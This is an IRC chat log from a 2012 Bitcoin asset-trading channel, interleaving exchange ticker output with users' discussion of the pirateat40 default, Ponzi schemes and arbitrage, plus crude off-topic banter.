BTC should go up, because people will write off their pirated bitcoins and will want to buy more Aug 29 07:58:07 [MPEX] [S.MPOE] 8000 @ 0.00038386 = 3.0709 BTC [+] Aug 29 07:58:08 [MPEX] [S.MPOE] 59500 @ 0.00038402 = 22.8492 BTC [+] Aug 29 07:58:09 [MPEX] [S.MPOE] 41600 @ 0.00038448 = 15.9944 BTC [+] Aug 29 07:58:10 [MPEX] [S.MPOE] 27500 @ 0.00038478 = 10.5815 BTC [+] Aug 29 07:58:11 [MPEX] [S.MPOE] 5028 @ 0.00038553 = 1.9384 BTC [+] Aug 29 07:58:11 hah Aug 29 07:58:11 [MPEX] [S.MPOE] 27514 @ 0.00038645 = 10.6328 BTC [+] Aug 29 07:58:12 [MPEX] [S.MPOE] 24500 @ 0.00038665 = 9.4729 BTC [+] Aug 29 07:58:13 I sold when he stopped operation, bought back low, then people realized it's not a pay back, but a default... am I better off? Aug 29 07:58:13 pirated bitcoins Aug 29 07:58:13 [MPEX] [S.MPOE] 7500 @ 0.00038723 = 2.9042 BTC [+] Aug 29 07:58:14 but anyway, his actions don't scream ponzi to me Aug 29 07:58:14 [MPEX] [S.MPOE] 11934 @ 0.00038826 = 4.6335 BTC [+] Aug 29 07:58:15 [MPEX] [S.MPOE] 1600 @ 0.00038993 = 0.6239 BTC [+] Aug 29 07:58:16 [MPEX] [S.MPOE] 8200 @ 0.00039022 = 3.1998 BTC [+] Aug 29 07:58:16 No Aug 29 07:58:17 [MPEX] [S.MPOE] 34700 @ 0.00039281 = 13.6305 BTC [+] Aug 29 07:58:18 [MPEX] [S.MPOE] 19100 @ 0.00039319 = 7.5099 BTC [+] Aug 29 07:58:19 [MPEX] [S.MPOE] 35562 @ 0.00039356 = 13.9958 BTC [+] Aug 29 07:58:20 [MPEX] [S.MPOE] 696 @ 0.00039404 = 0.2743 BTC [+] Aug 29 07:58:21 [MPEX] [S.MPOE] 2961 @ 0.00039414 = 1.167 BTC [+] Aug 29 07:58:21 [MPEX] [S.MPOE] 39229 @ 0.00039485 = 15.4896 BTC [+] Aug 29 07:58:22 [MPEX] [S.MPOE] 9882 @ 0.00039592 = 3.9125 BTC [+] Aug 29 07:58:23 [MPEX] [S.MPOE] 34494 @ 0.00039599 = 13.6593 BTC [+] Aug 29 07:58:24 [MPEX] [S.MPOE] 8357 @ 0.00039616 = 3.3107 BTC [+] Aug 29 07:58:25 [MPEX] [S.MPOE] 18300 @ 0.00039685 = 7.2624 BTC [+] Aug 29 07:58:26 [MPEX] [S.MPOE] 19448 @ 0.00039838 = 7.7477 BTC [+] Aug 29 07:58:27 [MPEX] [S.MPOE] 54395 @ 0.0004 = 21.758 BTC [+] Aug 29 07:58:34 S.MPOE: spammer :P Aug 29 07:58:44 ya srsly. Aug 29 07:58:58 dude get off the chan with s.mpoe we're trying to have drama hiar! Aug 29 07:59:06 Because if he paid his debt, how much people would have started getting into bitcoins because there was an actual, true 7% per week investment? Would have raised BTC price a lot Aug 29 07:59:19 BTC-Mining not the sort of peopleyou want. Aug 29 07:59:30 Bah, who cares Aug 29 07:59:59 [MPEX] [S.DICE] 1900 @ 0.0034 = 6.46 BTC [+] Aug 29 08:00:18 well... i kinda care tbh Aug 29 08:00:30 [GLBSE] [FPGAMINING] 1 @ 0.8389 BTC [-] Aug 29 08:00:37 why? don't you think people will wisen up to this now? Aug 29 08:00:51 now, some will, yes. Aug 29 08:00:58 some, maybe Aug 29 08:01:01 but he was talking about people attracted by ponzi-level interest. Aug 29 08:01:06 oh that Aug 29 08:01:14 you don't want those guys. you want people with a head on their shoulders. Aug 29 08:01:36 yeah, I really hope people didn't buy BTC just because there were crazy HYIPs Aug 29 08:01:36 i mean, why is alabama alabama and new york new york ? they both have people in them. Aug 29 08:01:37 no, _I_ want to get rich quickly tyvm Aug 29 08:01:45 lol Aug 29 08:01:51 different people tho. Aug 29 08:02:14 Who here has an MPeX account? Aug 29 08:02:24 ! Aug 29 08:02:29 !! Aug 29 08:02:35 i don't. wtf is mpex Aug 29 08:02:36 Do you guys want to make some money? Aug 29 08:02:39 I now have my coins with hashking patrickharnett and kluge.... the lure for hyip is still strong with me Aug 29 08:02:44 arbitrage? Aug 29 08:02:48 Yes. Aug 29 08:02:52 S.DICE Aug 29 08:02:52 ponzi? Aug 29 08:02:54 and i suspect many will still fall for it too Aug 29 08:02:56 lmiot Aug 29 08:02:58 GSDTP Aug 29 08:03:01 Go Aug 29 08:03:26 i wonder why deadterra doesn't do it tbh Aug 29 08:03:37 I'd invest with harnett Aug 29 08:03:40 well... i guess he's not online. Aug 29 08:03:52 because he is doxxed Aug 29 08:04:06 ;;calc 22000*0.0001 Aug 29 08:04:06 he seems pretty credible to me too. Aug 29 08:04:12 and I could have him killed quite cheaply Aug 29 08:04:37 bitfoo 2.2 Aug 29 08:04:41 heh Aug 29 08:04:43 lol Aug 29 08:04:57 Patrick is a good bet Aug 29 08:05:05 2.2 Aug 29 08:05:06 Buy some Kraken on GLBSE, I run it Aug 29 08:05:10 gribble, you're slow :P Aug 29 08:05:22 BTC-Mining: your fee is a bit rapacious Aug 29 08:05:35 pff, nonsense Aug 29 08:06:52 [GLBSE] [KRAKEN] 475 @ 0.01 = 4.75 BTC Aug 29 08:07:11 finally Aug 29 08:08:31 BTC-Mining: you already have all the funds available on glbse deposited with patrick i assume? Aug 29 08:09:18 patrick gave me 5 bitcoins for free Aug 29 08:09:22 on paper at least Aug 29 08:09:37 As soon as we reach a 100 BTC block, yes Aug 29 08:09:40 I transfer it Aug 29 08:09:55 but, it wouldn't accrue the full interest then right? Aug 29 08:09:58 I even have one extra block of my own money. Aug 29 08:09:59 how do you account for that Aug 29 08:10:04 And will pay the difference Aug 29 08:10:25 So it matches the week's returns for all shares, even if bought last minute Aug 29 08:10:32 coincidentally pirate also gave me five free bitcoins once Aug 29 08:10:46 ok Aug 29 08:11:01 and patrick's name starts with a p too Aug 29 08:11:03 [GLBSE] [TYGRR.BOND-P] 9 @ 0.11 = 0.99 BTC [+] Aug 29 08:11:21 bitfoo: im starting to feel ill Aug 29 08:11:24 [GLBSE] [TYGRR.BOND-P] 3 @ 0.11 = 0.33 BTC [+] Aug 29 08:11:26 hehe Aug 29 08:12:06 There's a ton of people with the name starting with P... Aug 29 08:12:35 pmickles Aug 29 08:12:37 Worst "coincidence or not?" example Aug 29 08:12:48 pickles* Aug 29 08:12:49 sorry my humor wasn't good enough :P Aug 29 08:13:03 bitfoo: i enjoyed it, don't listen to him Aug 29 08:13:13 lol Aug 29 08:13:26 pringkles Aug 29 08:13:33 pircea Aug 29 08:13:34 Didn't give me any reaction. I was just reading, completly unmoved Aug 29 08:13:48 ssssssttttttttttrrrrrrrrreeeeeeeeetttttttttccccccccccchhhhhhhhhhhh mircea_popescu Aug 29 08:14:06 lol pircea Aug 29 08:14:27 PITPOO Aug 29 08:14:55 lol Aug 29 08:14:58 http://polimedia.us/dtng/c/src/134621718320.jpg also, fresh from pirate's hideout. Aug 29 08:15:32 [GLBSE] [GSDPT] 1 @ 0.00313 BTC [-] Aug 29 08:15:45 why is that dude circled Aug 29 08:15:58 I'm now selling GSDPT at .003 Aug 29 08:16:02 Because I need the Bitcoins Aug 29 08:16:12 o it was you ? Aug 29 08:16:26 I'll pay 0.002! Aug 29 08:16:33 A good profit can be made from this. Aug 29 08:16:34 i was thinking wtf does EmanuelDeOrtego care about some 2 btc arbitrage Aug 29 08:16:47 you see my friend... if only you were on the exchange THAT HAS LIQUIDITY Aug 29 08:17:39 lol Aug 29 08:17:41 now it makes sense Aug 29 08:17:42 haha Aug 29 08:17:49 you know, the unprofessional one. Aug 29 08:18:17 I will get on it once we see more IPOs Aug 29 08:18:43 the one that hosts porn Aug 29 08:18:54 ya, the one that has no css and stuff. Aug 29 08:19:03 [GLBSE] [OBSI.HRPT] 5 @ 0.10498899 = 0.5249 BTC [+] Aug 29 08:19:05 [GLBSE] [OBSI.HRPT] 15 @ 0.104989 = 1.5748 BTC [+] Aug 29 08:21:25 wow! pirate paying all accounts! Aug 29 08:21:37 No? Aug 29 08:21:40 omfg Aug 29 08:21:54 good one Aug 29 08:21:56 i can't believe how cruel that was just now. Aug 29 08:22:27 Yes, you cruel, cruel man Aug 29 08:22:41 Have you got no shame? Aug 29 08:22:56 [01:22] * Garr255 (~Garrett@98.145.73.34) has joined #bitcoin-assets Aug 29 08:22:56 [01:22] * Garr255 (~Garrett@98.145.73.34) Quit (Changing host) Aug 29 08:22:56 [01:22] * Garr255 (~Garrett@unaffiliated/garr255) has joined #bitcoin-assets Aug 29 08:23:08 Nice IP hiding? Aug 29 08:23:08 well i have a little shame Aug 29 08:23:31 I've nothing to hide Aug 29 08:24:04 except fear itself Aug 29 08:24:11 wait, no Aug 29 08:24:26 sasl auth ftw anyway Aug 29 08:24:40 I just meant that it's a bit flawed Aug 29 08:24:40 sasl-tor ftw Aug 29 08:25:01 It seems, not that hiding your IP was a bad omen Aug 29 08:25:17 Luceo: Buy GSDPT on the GLBSE for .003 and sell it for .0033 on MPeX Aug 29 08:25:22 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Aug 29 08:26:10 EmanuelDeOrtego : drop ludwig an email eh ? Aug 29 08:26:14 No, keep it until the first divs and new design rolling out beggining of september Aug 29 08:26:15 he'll sort you out when he's up im sure Aug 29 08:26:34 I don't know if he will sell for me though Aug 29 08:26:51 why not ?! Aug 29 08:27:27 I'll do it in the morning then. Aug 29 08:27:52 [GLBSE] [BDT] 8 @ 1.05 = 8.4 BTC [+] Aug 29 08:27:57 wow... Aug 29 08:27:57 ;;seen pirateat40 Aug 29 08:27:57 * imsaguy2 sets mode +q #btcst *!~Garrett@unaffiliated/garr255 Aug 29 08:27:57 Garr255 : You may talk again when you learn to behave. Aug 29 08:28:24 that's a script Garr255, has been on for days now Aug 29 08:28:39 I know. Aug 29 08:28:54 Garr255 guy announced default. Aug 29 08:29:12 should I take up matthew on his bet? Aug 29 08:29:29 yes. Aug 29 08:29:34 I really don't want to lost 130 coins. who would? :P Aug 29 08:29:48 well it's too late, he's not taking new bets Aug 29 08:29:51 nor is he paying the old ones. Aug 29 08:30:07 he said he'd take mine :) Aug 29 08:30:12 I should have bet 25 million BTC then Aug 29 08:30:29 the fact that he isn't stopping taking bets makes me even more sure he won't pay Aug 29 08:30:55 dubious (to be generous) + won't use escrow Aug 29 08:31:02 what more sure than that would you need Aug 29 08:31:05 won't that totally ruin his company though? Aug 29 08:31:12 what company ? Aug 29 08:31:26 the bitcoin quarterly thing ? Aug 29 08:31:29 mircea_popescu: I bet 6 btc with him, and i will pay if i somehow lose Aug 29 08:31:30 bitcoin magazine, ellet, (nonexistant asic company) Aug 29 08:31:46 I would have bet a lot more had i thought he would actually live up to the obligations Aug 29 08:31:54 myea. Aug 29 08:31:56 I bet 400 BTC Aug 29 08:32:02 Should have bet more Aug 29 08:32:11 To me pirate was going to default in any case Aug 29 08:32:13 BTC-Mining: risk is too high Aug 29 08:32:21 -.- Aug 29 08:32:22 it isn't a matter of that Aug 29 08:32:33 http://www.youtube.com/watch?v=yDwk_fSAxYs Aug 29 08:32:41 it is a matter of someone coming up with tons of bitcoins to pay a silly bet Aug 29 08:32:52 who gambles 100-200k usd on something like that Aug 29 08:33:27 a shill. Aug 29 08:33:51 matthew is a shitpeice I'd rather sink more money into PPTs Aug 29 08:34:31 [GLBSE] [JAH] 10 @ 0.16 = 1.6 BTC [-] Aug 29 08:34:37 if he pays he gets my respect, but he won't Aug 29 08:34:58 ;;ticker Aug 29 08:34:59 Best bid: 10.99991, Best ask: 11.04, Bid-ask spread: 0.04009, Last trade: 11.04, 24 hour volume: 61816, 24 hour low: 10.5, 24 hour high: 11.20999 Aug 29 08:35:15 well darlings... this was too much excitement for just one day. see ya tomorro. **** BEGIN LOGGING AT Wed Aug 29 14:29:37 2012 Aug 29 14:32:37 [GLBSE] [BIB.PIRATE] 10 @ 0.071 = 0.71 BTC [+] Aug 29 14:32:39 [GLBSE] [TYGRR.BOND-P] 1 @ 0.19 BTC [+] Aug 29 14:34:03 [GLBSE] [FOO.PPPPT] 12 @ 0.07 = 0.84 BTC [-] Aug 29 14:38:18 [GLBSE] [FOO.PPPPT] 28 @ 0.07 = 1.96 BTC [-] Aug 29 14:38:19 [GLBSE] [FOO.PPPPT] 20 @ 0.07 = 1.4 BTC [-] Aug 29 14:40:43 [GLBSE] [FOO.PPPPT] 53 @ 0.05001 = 2.6505 BTC [-] Aug 29 14:43:26 [GLBSE] [BIB.PIRATE] 6 @ 0.07 = 0.42 BTC [-] Aug 29 14:45:53 [GLBSE] [MMM] 2 @ 0.9 = 1.8 BTC [+] Aug 29 14:46:45 [GLBSE] [BIB.PIRATE] 51 @ 0.05 = 2.55 BTC [-] Aug 29 14:48:32 [MPEX] [S.MPOE] 20389 @ 0.00039116 = 7.9754 BTC [-] Aug 29 14:49:30 [GLBSE] [TYGRR.BOND-P] 1 @ 0.19 BTC [+] Aug 29 14:49:44 [GLBSE] [MU] 1 @ 0.4938 BTC [+] Aug 29 14:51:08 !pl gigamining 1.5 Aug 29 14:51:08 Requesting data from GLBSE (might take a while). Aug 29 14:51:11 GIGAMINING [1@1.5BTC] paid: 0.41490096 BTC. Last price: 0.87899 BTC. Capital gain: -0.62101 BTC. Total: -0.20610904 BTC. (-13.7%) Aug 29 14:51:54 !ticker s.dice Aug 29 14:51:55 [MPEX:S.DICE] 1day: 0.0033 / 0.00334698 / 0.0034 (416700 shares, 1,394.69 BTC), 30day: 0.0032 / 0.00324655 / 0.0034 (2769663 shares, 8,991.87 BTC) Aug 29 14:54:09 !pl tygrr.bond-p 1.02 Aug 29 14:54:10 Requesting data from GLBSE (might take a while). Aug 29 14:54:10 are all the mining bonds dying now Aug 29 14:54:14 TYGRR.BOND-P [1@1.02BTC] paid: 0.816 BTC. Last price: 0.19 BTC. Capital gain: -0.83 BTC. Total: -0.014 BTC. (-1.4%) Aug 29 14:54:47 hey that's actually not doing so bad there. Aug 29 14:55:02 rg giga took a serious beating yest, was down to .7 but seems to be coming back to life. Aug 29 14:55:02 yeah, holds up even at 0.19 Aug 29 14:58:02 interesting Aug 29 14:58:03 any reason why Aug 29 14:58:06 or just cuz Aug 29 14:59:18 damn it Aug 29 14:59:22 my room mate took the day off esterday Aug 29 14:59:25 looks like hes doing it again today Aug 29 14:59:29 and hes in the bathroom Aug 29 14:59:34 hwich means he wont be out of there for at least an hour Aug 29 14:59:37 i have to take a shit god damn it Aug 29 14:59:56 what self respecting man takes an hour in the bathroom to get ready in the morning Aug 29 15:00:00 for fucks sake Aug 29 15:00:28 he doesnt wash his hansd either Aug 29 15:00:30 its disgustin Aug 29 15:00:43 ..................... < I've been slowly typing this one dot per second at the way you decided to formulate this Aug 29 15:00:44 i get ready in the car during commute Aug 29 15:01:08 most people: Aug 29 15:01:12 shit, shave, shower, get dressed and leave Aug 29 15:01:20 he like Aug 29 15:01:22 stays ni there Aug 29 15:01:24 fuck knows what hes ding Aug 29 15:01:26 doing Aug 29 15:01:28 I shower before sleeping Aug 29 15:01:46 i sleep before shower Aug 29 15:01:46 i dont, i find that gross Aug 29 15:01:53 If I wake up late, I dress and start running for it. Aug 29 15:02:00 you sweat during sleep Aug 29 15:02:01 a lot Aug 29 15:02:16 Nah, I don't sweat much Aug 29 15:02:28 moneyisdebt you sold that tygrrbond at the right time! Aug 29 15:02:29 you do Aug 29 15:02:35 you can buy back double now :) Aug 29 15:02:40 ... well no Aug 29 15:03:08 Chaang-Noi: Well, I could have sold higher had I gone slower though Aug 29 15:03:21 You probably made a profit on them already? Aug 29 15:03:33 Not sure if it's a good idea to buy back Aug 29 15:03:40 have been out of touch on pirate news lately Aug 29 15:03:40 If I do the same excercise that would get other people completly damp in sweat, I'd have light spots in the armpits... Aug 29 15:03:48 [MPEX] [F.GIGA.ETF] 4900 @ 0.0007838 = 3.8406 BTC [+] Aug 29 15:04:09 I would expect pirate to buy them all back if he was going to pay. Since he hasn't, I think he's not able (yet) Aug 29 15:04:23 I have under 5% body fat, I don't need to sweat to get heat off. Aug 29 15:04:34 MoneisDebt assuming pirate wont pay anything im pretty fucked Aug 29 15:04:46 Beside, it's because I don't like the bed feeling sweaty that I prefer washing prior to sleep. Aug 29 15:05:21 btc-mining: you are missing the point Aug 29 15:05:26 when you are asleep, you dont notice heat Aug 29 15:05:27 Chaang-Noi: You hold a lot of the bonds in addition to your account with him? Aug 29 15:05:28 if you're under a blanket Aug 29 15:05:31 you will sweat Aug 29 15:05:40 yes Aug 29 15:05:44 over 10k btc Aug 29 15:05:46 plus you're sleeping in 8 hours of body waste Aug 29 15:05:49 every might Aug 29 15:05:49 damn Aug 29 15:05:50 night Aug 29 15:05:50 [GLBSE] [BBBB] 50 @ 0.00025 = 0.0125 BTC [-] Aug 29 15:05:56 im pretty fucked Aug 29 15:06:38 im downloading Stir of Echoes Aug 29 15:06:41 thsi movie rocked Aug 29 15:06:52 iirc theres boobies in it too Aug 29 15:06:54 Okay... not sure about you but I'm perfectly clean when I wake up. Aug 29 15:07:18 i hope you wash your sheets every night then Aug 29 15:07:20 I'm much dirtier at the end of the day then after a night's sleep Aug 29 15:07:20 cause if you dont Aug 29 15:07:21 you arent. Aug 29 15:08:28 That seems very innacurate. Aug 29 15:09:24 your body leaks grease Aug 29 15:09:25 and skin cells Aug 29 15:09:32 s/grease/oils Aug 29 15:09:47 It does the same thing during the day, I don't see your point Aug 29 15:09:49 plus your ass and junk is rubbing up against your sheets Aug 29 15:09:55 cause you're not attached to a peice of cloth Aug 29 15:09:56 all day Aug 29 15:09:58 to your face Aug 29 15:10:08 and you dont get back into that piece of cloth for 8+ hrs a night Aug 29 15:10:09 voer and oer Aug 29 15:10:12 over and over Aug 29 15:10:57 ..................... < I've been slowly typing this one dot per second at the way you decided to formulate this <<< win. Aug 29 15:11:22 yes, hiss tory was nicely formulated Aug 29 15:11:23 i dont give a fuck Aug 29 15:11:28 dont read it if you have a problem with it Aug 29 15:11:56 no, the way yu said it was obnoxious and I was pondering if you were realizing it Aug 29 15:12:38 plus your ass and junk is rubbing up against your sheets << i wear pjs! Aug 29 15:12:38 sorry i didn't live up to your standards Aug 29 15:12:44 and a little hat! Aug 29 15:12:51 mircea_popescu: me too, i have these adidas track pants i wear to bed Aug 29 15:12:57 theyre comfy Aug 29 15:13:03 i wear *tailored* pjs. Aug 29 15:13:04 I recommend you reread this part: Aug 29 15:13:08 [07:59] damn it Aug 29 15:13:08 [07:59] my room mate took the day off esterday Aug 29 15:13:08 [07:59] looks like hes doing it again today Aug 29 15:13:08 [07:59] and hes in the bathroom Aug 29 15:13:11 just to give you an ideea what sort of pretentious fart i am. Aug 29 15:13:20 that's what the dots were for.. Aug 29 15:13:38 great btc-mining Aug 29 15:13:54 mircea_popescu: if i could afford tailored stuff i would wear it too Aug 29 15:14:07 it's not so bad if you live in a poor country. Aug 29 15:14:10 [GLBSE] [ASICMINER] 99 @ 0.11979 = 11.8592 BTC [+] Aug 29 15:14:12 [GLBSE] [ASICMINER] 50 @ 0.1198 = 5.99 BTC [+] Aug 29 15:14:12 [GLBSE] [ASICMINER] 100 @ 0.12 = 12 BTC [+] Aug 29 15:14:16 my monogram would say RAPEGHOST Aug 29 15:14:24 cause every letter is as important as the previous Aug 29 15:14:43 why not in triplicate then Aug 29 15:15:09 if theres any room left i will put a bunch of exclamation marks Aug 29 15:15:12 and some flames Aug 29 15:15:17 [GLBSE] [ZETA-MINING] 10 @ 0.15 = 1.5 BTC [-] Aug 29 15:15:19 [GLBSE] [ZETA-MINING] 10 @ 0.149 = 1.49 BTC [-] Aug 29 15:15:48 you'll end up looking like you don't sleep, you rodeo Aug 29 15:15:52 and then duet with elvis Aug 29 15:15:55 [GLBSE] [GIGAMINING] 5 @ 0.8501 = 4.2505 BTC [-] Aug 29 15:15:57 [GLBSE] [GIGAMINING] 3 @ 0.85 = 2.55 BTC [-] Aug 29 15:16:52 that sounds legit Aug 29 15:17:14 [MPEX] [S.MPOE] 42026 @ 0.00039116 = 16.4389 BTC [-] Aug 29 15:17:16 [MPEX] [S.MPOE] 12025 @ 0.00039094 = 4.7011 BTC [-] Aug 29 15:17:17 [MPEX] [S.MPOE] 1323 @ 0.0003893 = 0.515 BTC [-] Aug 29 15:17:18 [MPEX] [S.MPOE] 7162 @ 0.00038893 = 2.7855 BTC [-] Aug 29 15:17:43 [GLBSE] [FPGAMINING] 4 @ 0.8401 = 3.3604 BTC [-] Aug 29 15:17:44 [GLBSE] [FPGAMINING] 7 @ 0.84 = 5.88 BTC [-] Aug 29 15:17:51 [MPEX] [F.GIGA.ETF] 1900 @ 0.00078277 = 1.4873 BTC [-] Aug 29 15:17:53 [MPEX] [F.GIGA.ETF] 12200 @ 0.00078489 = 9.5757 BTC [+] Aug 29 15:17:54 [MPEX] [F.GIGA.ETF] 9629 @ 0.00079197 = 7.6259 BTC [+] Aug 29 15:17:55 [MPEX] [F.GIGA.ETF] 19500 @ 0.00079246 = 15.453 BTC [+] Aug 29 15:17:56 [MPEX] [F.GIGA.ETF] 500 @ 0.0007963 = 0.3982 BTC [+] Aug 29 15:17:58 [MPEX] [F.GIGA.ETF] 1270 @ 0.00079661 = 1.0117 BTC [+] Aug 29 15:18:32 [MPEX] [F.GIGA.ETF] 2520 @ 0.00079661 = 2.0075 BTC [+] Aug 29 15:18:33 [MPEX] [F.GIGA.ETF] 480 @ 0.00096661 = 0.464 BTC [+] Aug 29 15:23:14 [MPEX] [S.MPOE] 33400 @ 0.00039157 = 13.0784 BTC [+] Aug 29 15:28:51 [MPEX] [S.MPOE] 5534 @ 0.00039157 = 2.1669 BTC [+] Aug 29 15:28:53 [MPEX] [S.MPOE] 10179 @ 0.00039262 = 3.9965 BTC [+] Aug 29 15:28:54 [MPEX] [S.MPOE] 887 @ 0.00039317 = 0.3487 BTC [+] Aug 29 15:35:42 [GLBSE] [ASICMINER] 200 @ 0.12299 = 24.598 BTC [+] Aug 29 15:36:59 [GLBSE] [BBBB] 280 @ 0.00025 = 0.07 BTC [-] Aug 29 15:40:53 [GLBSE] [FPGAMINING] 2 @ 0.8949 = 1.7898 BTC [+] Aug 29 15:42:50 [GLBSE] [PPT.DIV] 15 @ 0.010001 = 0.15 BTC [+] Aug 29 15:44:33 [GLBSE] [YARR] 11 @ 1 = 11 BTC [+] Aug 29 15:48:04 [GLBSE] [NYAN.B] 4 @ 0.99999999 = 4 BTC [-] Aug 29 15:48:06 [GLBSE] [NYAN.B] 5 @ 0.99999999 = 5 BTC [-] Aug 29 15:52:43 sup Aug 29 15:59:30 what's down more like it Aug 29 16:00:07 :) Aug 29 16:00:19 whats down Aug 29 16:01:21 mining and pirate debt Aug 29 16:01:29 and bitcoin I think Aug 29 16:01:37 or maybe i just bought at a high Aug 29 16:01:46 ;;ticker Aug 29 16:01:46 Best bid: 10.76874, Best ask: 10.78, Bid-ask spread: 0.01126, Last trade: 10.78, 24 hour volume: 62642, 24 hour low: 10.5, 24 hour high: 11.20999 Aug 29 16:01:56 I bought at 11.8 Aug 29 16:02:00 ouch Aug 29 16:02:10 well its still going strong Aug 29 16:02:12 doesn't really matter, since I'm not selling Aug 29 16:02:33 [GLBSE] [ARS] 3 @ 0.0159 = 0.0477 BTC [+] Aug 29 16:03:00 I find it hard to find good investments though Aug 29 16:03:07 I don't want to just sit on the coins Aug 29 16:03:36 although that's been paying more than mining bonds lately Aug 29 16:03:39 history is repeating Aug 29 16:03:47 [MPEX] [S.MPOE] 21200 @ 0.00039068 = 8.2824 BTC [-] Aug 29 16:03:49 [MPEX] [S.MPOE] 27600 @ 0.00038893 = 10.7345 BTC [-] Aug 29 16:04:26 ;;ticker Aug 29 16:04:27 Best bid: 10.77293, Best ask: 10.8, Bid-ask spread: 0.02707, Last trade: 10.66713, 24 hour volume: 62709, 24 hour low: 10.5, 24 hour high: 11.20999 Aug 29 16:04:32 bitcoin seems more or less even Aug 29 16:04:58 easy to calculate with a rate of ten Aug 29 16:04:58 MoneyIsDebt i have 60 bitcoins still that i bought in july 2011, they cost me 15. Aug 29 16:05:00 i sold at 13.5, 12 and some under 10 Aug 29 16:05:04 heh Aug 29 16:05:05 as you say... doesn't matter till i sell them :D Aug 29 16:05:35 mircea_popescu: I was _given_ 10 by a random dude when they were worth nothing Aug 29 16:05:45 wish I'd had the foresight to invest back then Aug 29 16:05:55 :))) Aug 29 16:06:03 hehe Aug 29 16:06:12 i wasn't here that long. only joined in july. Aug 29 16:06:15 my first buy those, too :D Aug 29 16:06:51 I was convinced it would fail then , because any rich kid could buy a big enough chunk to make it volatile / high risk Aug 29 16:09:03 I later learned that it doesn't matter what I thought as long as the majority on the market thinks otherwise Aug 29 16:12:19 wtf is this https://www.bitcoinrain.com/ Aug 29 16:12:31 new ponzee Aug 29 16:12:32 :D Aug 29 16:13:19 MoneyIsDebt hehe that'd be right Aug 29 16:13:41 kakobrekla i hope there's 500 new ones. Aug 29 16:14:06 "Since October 2011, we are the most profitable Bitcoin investment group!" Aug 29 16:14:07 lolz. Aug 29 16:14:13 mircea_popescu: Then you can tranche between them ? Aug 29 16:14:34 MoneyIsDebt no, just help drive the nonsense into the ground / everyone's thick skull. Aug 29 16:15:21 a ponzi isn't really dangerous unless it gets big. Aug 29 16:17:18 ;;ticker Aug 29 16:17:20 Best bid: 10.66, Best ask: 10.67, Bid-ask spread: 0.01000, Last trade: 10.68, 24 hour volume: 59730, 24 hour low: 10.55, 24 hour high: 11.20999 Aug 29 16:17:51 isn't the whole bitcoin price result of ponzi Aug 29 16:18:00 new investors pushing the value up Aug 29 16:18:08 for those who invested earlier Aug 29 16:18:45 is gold ponzi as well Aug 29 16:19:26 sure it is! Aug 29 16:19:43 fiat is with out a doubt ponzi Aug 29 16:19:48 gold and btc are not Aug 29 16:20:02 pirate might ha ve been Aug 29 16:20:03 hm? Aug 29 16:20:16 [GLBSE] [GIGAMINING] 2 @ 0.87899 = 1.758 BTC [+] Aug 29 16:20:17 [GLBSE] [GIGAMINING] 9 @ 0.879 = 7.911 BTC [+] Aug 29 16:20:18 a ponzi always has a ponzi Aug 29 16:20:22 ie, a head person/decident Aug 29 16:20:33 like satoshi.... Aug 29 16:20:34 something like btc or gold aren't by that definition nor can they be. Aug 29 16:20:41 not really i wouldn't say. Aug 29 16:20:59 plenty of detractors have been accusing bitcoin of that though Aug 29 16:21:00 decident in the sense, decides who and when gets paid Aug 29 16:21:08 although they call it pyramid or something Aug 29 16:21:09 satoshi doesn't decide that, anyone can sell any time.\ Aug 29 16:21:18 no, pyramid either Aug 29 16:21:24 all those are lock-in schemes. btc is not. Aug 29 16:21:44 well even pirate debt was freely tradable Aug 29 16:22:00 or at least derivatives of it was Aug 29 16:22:01 sure, but that was a derivative. Aug 29 16:22:03 right. Aug 29 16:22:06 :) Aug 29 16:22:27 anyway gtc cya all later Aug 29 16:22:38 ciao Aug 29 16:32:50 [GLBSE] [TYGRR.BOND-P] 1 @ 0.16 BTC [-] Aug 29 16:32:52 [GLBSE] [TYGRR.BOND-P] 21 @ 0.115 = 2.415 BTC [-] Aug 29 16:32:53 [GLBSE] [TYGRR.BOND-P] 14 @ 0.10101 = 1.4141 BTC [-] Aug 29 16:32:54 [GLBSE] [TYGRR.BOND-P] 10 @ 0.101 = 1.01 BTC [-] Aug 29 16:43:40 [GLBSE] [PUREMINING] 2 @ 0.0958 = 0.1916 BTC [-] Aug 29 16:45:41 [GLBSE] [BITCOINMINV] 4 @ 0.13 = 0.52 BTC [-] Aug 29 16:46:44 [MPEX] [S.MPOE] 5294 @ 0.00038893 = 2.059 BTC [-] Aug 29 16:46:45 [MPEX] [S.MPOE] 21006 @ 0.00038858 = 8.1625 BTC [-] Aug 29 16:47:27 [GLBSE] [GSDPT] 226 @ 0.00338999 = 0.7661 BTC [+] Aug 29 16:49:59 [GLBSE] [GSDPT] 2 @ 0.00338999 = 0.0068 BTC [+] Aug 29 16:54:00 [GLBSE] [OBSI.HRPT] 100 @ 0.104 = 10.4 BTC [-] Aug 29 16:54:02 [GLBSE] [OBSI.HRPT] 300 @ 0.1045 = 31.35 BTC [+] Aug 29 16:54:03 [GLBSE] [OBSI.HRPT] 32 @ 0.10479 = 3.3533 BTC [+] Aug 29 16:54:05 [GLBSE] [BITCOINMINV] 1 @ 0.13 BTC [-] Aug 29 16:54:46 [GLBSE] [PPT.E] 6 @ 0.3615 = 2.169 BTC [-] Aug 29 16:56:46 [GLBSE] [GSDPT] 5 @ 0.00338999 = 0.0169 BTC [+] Aug 29 16:58:08 [GLBSE] [PPT.E] 12 @ 0.3615 = 4.338 BTC [-] Aug 29 17:02:57 [MPEX] [S.MPOE] 22196 @ 0.00039134 = 8.6862 BTC [+] Aug 29 17:02:58 [MPEX] [S.MPOE] 11040 @ 0.00039317 = 4.3406 BTC [+] Aug 29 17:04:57 [GLBSE] [OBSI.HRPT] 1 @ 0.10479 BTC [+] Aug 29 17:05:01 [MPEX] [S.MPOE] 894 @ 0.00038858 = 0.3474 BTC [-] Aug 29 17:05:02 [MPEX] [S.MPOE] 19900 @ 0.00038816 = 7.7244 BTC [-] Aug 29 17:05:04 [MPEX] [S.MPOE] 39906 @ 0.00038778 = 15.4747 BTC [-] Aug 29 17:06:35 [GLBSE] [TYGRR.BOND-P] 1 @ 0.08 BTC [-] Aug 29 17:07:16 [GLBSE] [PPT.B] 33 @ 0.3701 = 12.2133 BTC [-] Aug 29 17:07:18 [GLBSE] [PPT.B] 8 @ 0.37 = 2.96 BTC [-] Aug 29 17:09:56 man what the fuck Aug 29 17:10:05 its the middle of august Aug 29 17:10:13 the hottest month of the year in maine Aug 29 17:10:19 it has now just reached 72. Aug 29 17:10:29 its 67 in my room Aug 29 17:12:20 and my gpu has just reached 76c Aug 29 